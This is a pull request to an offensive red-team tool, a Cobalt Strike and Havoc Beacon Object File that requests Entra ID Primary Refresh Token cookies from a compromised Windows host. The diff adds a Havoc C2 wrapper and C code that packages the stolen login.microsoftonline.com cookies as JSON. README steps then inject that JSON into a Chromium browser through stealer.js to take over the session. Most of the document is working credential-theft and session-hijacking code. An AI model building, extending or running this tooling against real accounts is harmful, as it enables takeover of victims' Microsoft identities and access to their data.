### PR TITLE
Stealer.js Compatibility

### DIFF
--- a/README.md
+++ b/README.md
@@ -18,7 +18,7 @@ After compiling, load the `aadprt.cna` file into Cobalt Strike.
 4. Profit!
 
 ### Injecting Cookies into Browser
-This can be done manually on a per cookie basis, or automatically via [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) from the [Cuddlephish](https://github.com/fkasler/cuddlephish). The BOF will output a JSON blob ,like `{"url":"https://login.microsoftonline.com","cookies":[...],"local_storage":[])`, which you can paste into a file and automatically inject into a chromium browser using 
+This can be done manually on a per cookie basis, or automatically via [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) from the [Cuddlephish](https://github.com/fkasler/cuddlephish). The BOF will output a JSON blob, in the format `{"url":"https://login.microsoftonline.com","cookies":[...],"local_storage":[])`, which you can paste into a file and automatically inject into a chromium browser using 
 ```
 node .\stealer.js .\aadprt_cookies.json
 ```

--- a/README.md
+++ b/README.md
@@ -17,6 +17,18 @@ After compiling, load the `aadprt.cna` file into Cobalt Strike.
 3. Use the token to authenticate in ROADrecon (or any other tool): `roadrecon auth --prt-cookie [TOKEN]`
 4. Profit!
 
+### Injecting Cookies into Browser
+This can be done manually on a per cookie basis, or automatically via [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) from the [Cuddlephish](https://github.com/fkasler/cuddlephish). The BOF will output a JSON blob ,like `{"url":"https://login.microsoftonline.com","cookies":[...],"local_storage":[])`, which you can paste into a file and automatically inject into a chromium browser using 
+```
+node .\stealer.js .\aadprt_cookies.json
+```
+
+This requires installing [Node.js](https://nodejs.org/en/download) and stealer's dependecies
+```
+npm install puppeteer-extra
+npm install puppeteer-extra-plugin-stealth
+```
+
 ## References
 
 Heavily inspired by the awesome work and research of [Dirk-jan](https://twitter.com/_dirkjan) and [Lee](http://twitter.com/tifkin_).

--- a/README.md
+++ b/README.md
@@ -18,7 +18,7 @@ After compiling, load the `aadprt.cna` file into Cobalt Strike.
 4. Profit!
 
 ### Injecting Cookies into Browser
-This can be done manually on a per cookie basis, or automatically via [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) from the [Cuddlephish](https://github.com/fkasler/cuddlephish). The BOF will output a JSON blob, in the format `{"url":"https://login.microsoftonline.com","cookies":[...],"local_storage":[])`, which you can paste into a file and automatically inject into a chromium browser using 
+This can be done manually on a per cookie basis, or automatically via [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) from [Cuddlephish](https://github.com/fkasler/cuddlephish). The BOF will output a JSON blob, in the format `{"url":"https://login.microsoftonline.com","cookies":[...],"local_storage":[])`, which you can paste into a file and automatically inject into a chromium browser using 
 ```
 node .\stealer.js .\aadprt_cookies.json
 ```

--- a/aadprt_havoc.py
+++ b/aadprt_havoc.py
@@ -1,0 +1,47 @@
+
+#
+# Havoc Module
+#
+from havoc import Demon, RegisterCommand
+from pathlib import Path
+import hashlib
+
+def parse_params( demon, params ):
+    packer = Packer()
+
+    num_params = len(params)
+    
+    nonce = ""
+
+    if num_params > 1:
+        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
+        return None
+
+    if num_params < 1:
+        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Missing nonce" )
+        return None
+
+    if num_params >= 1:
+        nonce = params[ 0 ]
+
+    packer.addWstr(nonce)
+
+    return packer.getbuffer()
+
+
+def aadprt( demonID, *params ):
+    TaskID : str    = None
+    demon  : Demon  = None
+    demon  = Demon( demonID )
+
+    packed_params = parse_params( demon, params )
+    if packed_params is None:
+        return False
+
+    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon request an Entra ID PRT" )
+
+    demon.InlineExecute( TaskID, "go", f"aadprt.{demon.ProcessArch}.o", packed_params, False )
+
+    return TaskID
+
+RegisterCommand( aadprt, "", "aadprt", "Request an Entra ID PRT", 0, "[nonce]", "" )

--- a/entry.c
+++ b/entry.c
@@ -4,7 +4,6 @@
 
 
 int requestaadprt(LPCWSTR nonce) {
-
 	LPCWSTR uri = L"https://login.microsoftonline.com/";
 	wchar_t * full_uri = NULL;
 	// We have a nonce, let's build the URL for it
@@ -57,20 +56,81 @@ int requestaadprt(LPCWSTR nonce) {
 		return 0;
 	}
 
+	// stealer.js JSON string prep
+	wchar_t* stealerPrefix = L"{\"url\":\"https://login.microsoftonline.com\",\"cookies\":[";
+	wchar_t* stealerSuffix = L"],\"local_storage\":[]}";
+	
+	size_t jsonSize = 0;
+	size_t capacity = 2048;
+	
+	wchar_t* jsonOutput = (wchar_t*)MSVCRT$malloc(capacity * sizeof(wchar_t));
+	if(jsonOutput == NULL){
+		internal_printf("Failed to initialize memory\n");
+		return 1;
+	}
+
+	MSVCRT$wcscpy(jsonOutput, stealerPrefix);
+	jsonSize = MSVCRT$wcslen(jsonOutput);
+
 	for (DWORD i = 0; i < cookieCount; i++) {
 		internal_printf("Name %ls\n", cookies[i].name);
 		internal_printf("Name: %ls\n", cookies[i].name);
 		internal_printf("Data: %ls\n", cookies[i].data);
 		internal_printf("Flags: %x\n", cookies[i].flags);
 		internal_printf("P3PHeader: %ls\n\n", cookies[i].p3pHeader);
+		
+		// truncate string to just the cookie value; other data appears to be static 60 chars
+		//   ; path=/; domain=login.microsoftonline.com; secure; httponly
+		size_t cookieValueLen = MSVCRT$wcslen(cookies[i].data);
+		if (cookieValueLen > 60) {
+			cookies[i].data[cookieValueLen - 60] = L'\0';
+		}
+
+		wchar_t* cookieJson = (wchar_t*)MSVCRT$malloc(2048 * sizeof(wchar_t));
+		
+		int written = MSVCRT$_snwprintf(
+			cookieJson,
+			2048,
+			L"{\"name\":\"%ls\",\"value\":\"%ls\",\"domain\":\"login.microsoftonline.com\",\"path\":\"/\",\"secure\":true,\"httpOnly\":true},",
+			cookies[i].name,
+			cookies[i].data
+		);
+		size_t chunkLen = MSVCRT$wcslen(cookieJson);
+
+		// check if we need to resize the JSON buffer
+		if (jsonSize + chunkLen + MSVCRT$wcslen(stealerSuffix) + 1 > capacity) {
+			capacity += 2048;
+			wchar_t* newOutput = (wchar_t*)MSVCRT$realloc(jsonOutput, capacity * sizeof(wchar_t));
+			if(newOutput == NULL){
+				internal_printf("Failed to initialize memory\n");
+				return 1;
+			}
+			jsonOutput = newOutput;
+		}
+		MSVCRT$wcscat(jsonOutput, cookieJson);
+		jsonSize += chunkLen;
+		MSVCRT$free(cookieJson);
 
 		OLE32$CoTaskMemFree(cookies[i].name);
 		OLE32$CoTaskMemFree(cookies[i].data);
 		OLE32$CoTaskMemFree(cookies[i].p3pHeader);
 	}
+
+	// remove trailing comma from JSON string, append suffix
+	if (jsonSize > 0 && jsonOutput[jsonSize - 1] == L',') {
+		jsonOutput[jsonSize - 1] = L'\0';
+		jsonSize--;
+	}
+	MSVCRT$wcscat(jsonOutput, stealerSuffix);
+
+	internal_printf("\nJSON cookie blob for use with stealer.js:\n");
+	printoutput(FALSE); // empty the buffer since the JSON string can get beefy
+	internal_printf("%ls\n\n", jsonOutput);
+	
+	MSVCRT$free(jsonOutput);
 	OLE32$CoTaskMemFree(cookies);
 	MSVCRT$free(full_uri);
-	
+
 	internal_printf("DONE\n");
 
 	return 0;

--- a/entry.c
+++ b/entry.c
@@ -84,12 +84,15 @@ int requestaadprt(LPCWSTR nonce) {
 		if (semicolonPos != NULL) {
 			*semicolonPos = L'\0';
 		}
-
-		wchar_t* cookieJson = (wchar_t*)MSVCRT$malloc(2048 * sizeof(wchar_t));
+		size_t nameLen = MSVCRT$wcslen(cookies[i].name);
+		size_t dataLen = MSVCRT$wcslen(cookies[i].data);
+		size_t neededSize = nameLen + dataLen + 256;
+		
+		wchar_t* cookieJson = (wchar_t*)MSVCRT$malloc(neededSize * sizeof(wchar_t));
 		
 		int written = MSVCRT$_snwprintf(
 			cookieJson,
-			2048,
+			neededSize,
 			L"{\"name\":\"%ls\",\"value\":\"%ls\",\"domain\":\"login.microsoftonline.com\",\"path\":\"/\",\"secure\":true,\"httpOnly\":true},",
 			cookies[i].name,
 			cookies[i].data

--- a/entry.c
+++ b/entry.c
@@ -79,11 +79,10 @@ int requestaadprt(LPCWSTR nonce) {
 		internal_printf("Flags: %x\n", cookies[i].flags);
 		internal_printf("P3PHeader: %ls\n\n", cookies[i].p3pHeader);
 		
-		// truncate string to just the cookie value; other data appears to be static 60 chars
-		//   ; path=/; domain=login.microsoftonline.com; secure; httponly
-		size_t cookieValueLen = MSVCRT$wcslen(cookies[i].data);
-		if (cookieValueLen > 60) {
-			cookies[i].data[cookieValueLen - 60] = L'\0';
+		// copy every char up until the first semi-colon char
+		wchar_t* semicolonPos = MSVCRT$wcschr(cookies[i].data, L';');
+		if (semicolonPos != NULL) {
+			*semicolonPos = L'\0';
 		}
 
 		wchar_t* cookieJson = (wchar_t*)MSVCRT$malloc(2048 * sizeof(wchar_t));

--- a/headers/headers.h
+++ b/headers/headers.h
@@ -12,6 +12,11 @@ WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
 WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg);
 WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t *pReturnValue, wchar_t * wcstr, size_t smt,const char *mbstr, size_t count);
 WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str);
+WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
+WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize);
+WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source);
+WINBASEAPI int WINAPI MSVCRT$_snwprintf(wchar_t *buffer, size_t count, const wchar_t *format, ...);
+WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source);
 
 WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString);
 WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength);
@@ -38,6 +43,11 @@ DECLSPEC_IMPORT HRESULT WINAPI COOKIE$GetCookieInfoForUri(LPCWSTR uri, DWORD *co
 #define MSVCRT$vsnprintf vsnprintf
 #define MSVCRT$mbstowcs_s mbstowcs_s
 #define MSVCRT$strlen strlen
+#define MSVCRT$malloc malloc
+#define MSVCRT$realloc realloc
+#define MSVCRT$wcscpy wcscpy
+#define MSVCRT$_snwprintf _snwprintf
+#define MSVCRT$wcscat wcscat
 
 #define Kernel32$WideCharToMultiByte  WideCharToMultiByte
 #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)

--- a/headers/headers.h
+++ b/headers/headers.h
@@ -17,6 +17,7 @@ WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize);
 WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source);
 WINBASEAPI int WINAPI MSVCRT$_snwprintf(wchar_t *buffer, size_t count, const wchar_t *format, ...);
 WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source);
+WINBASEAPI wchar_t *__cdecl MSVCRT$wcschr(const wchar_t * _Str, wchar_t _Ch);
 
 WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString);
 WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength);


### PR DESCRIPTION
Slight quality of life modification to include the tokens in a JSON blob that can be fed into [stealer.js](https://github.com/fkasler/cuddlephish/blob/main/stealer.js) , which can automatically open a Chromium browser and inject the cookies into it.

Example:
![image](https://github.com/user-attachments/assets/0c60949a-3b8a-4718-865c-c7cced1d0d1f)

The PR also includes a BOF wrapper for Havoc.